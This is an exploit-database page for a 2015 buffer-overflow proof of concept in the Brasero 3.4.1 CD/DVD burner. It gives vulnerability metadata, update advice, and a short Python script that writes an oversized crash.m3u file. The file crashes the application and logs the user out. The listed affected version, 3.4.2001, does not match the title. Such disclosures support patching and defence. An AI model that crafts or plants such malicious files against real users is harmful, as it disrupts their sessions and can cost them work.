Brasero 3.4.1 'm3u' Buffer Overflow POC

vendor:

Brasero

by:

Avinash Kumar Thapa '-Acid'

7.8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Brasero

Affected Version From: 3.4.2001

Affected Version To: 3.4.2001

Patch Exists: Yes

Related CWE: N/A

CPE: a:gnome:brasero

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Kali Linux 1.0.9

2015

Brasero 3.4.1 ‘m3u’ Buffer Overflow POC

A buffer overflow vulnerability exists in Brasero 3.4.1 CD/DVD for the Gnome Desktop. An attacker can exploit this vulnerability by creating a malicious .m3u file with a buffer of over 26109 A characters followed by 4 C characters and 10500 D characters. When the malicious file is opened with Brasero CD/DVD burner, it leads to a crash which results in the user being logged out of their current session.

Mitigation:

Update to the latest version of Brasero CD/DVD burner.

Source

Exploit-DB raw data:

#!/usr/bin/python

#Exploit title: Brasero 3.4.1 'm3u' Buffer Overflow POC
#Date Discovered: 15th March' 2015
# Exploit Author: Avinash Kumar Thapa "-Acid"
# Vulnerable Software: Brasero 3.4.1 CD/DVD for the Gnome Desktop
# Homepage:https://wiki.gnome.org/Apps/Brasero
# Tested on: Kali Linux 1.0.9

buffer ="A"*26109

buffer += "CCCC"

buffer += "D"*10500

file = "crash.m3u"

f = open(file, "w")

f.write(buffer)

f.close()

# After running exploit, run malicious file with brasero CD/DVD burner and check the crash which leads to logged out from your current session.
#####################################################################
# -Acid                                                             #
#####################################################################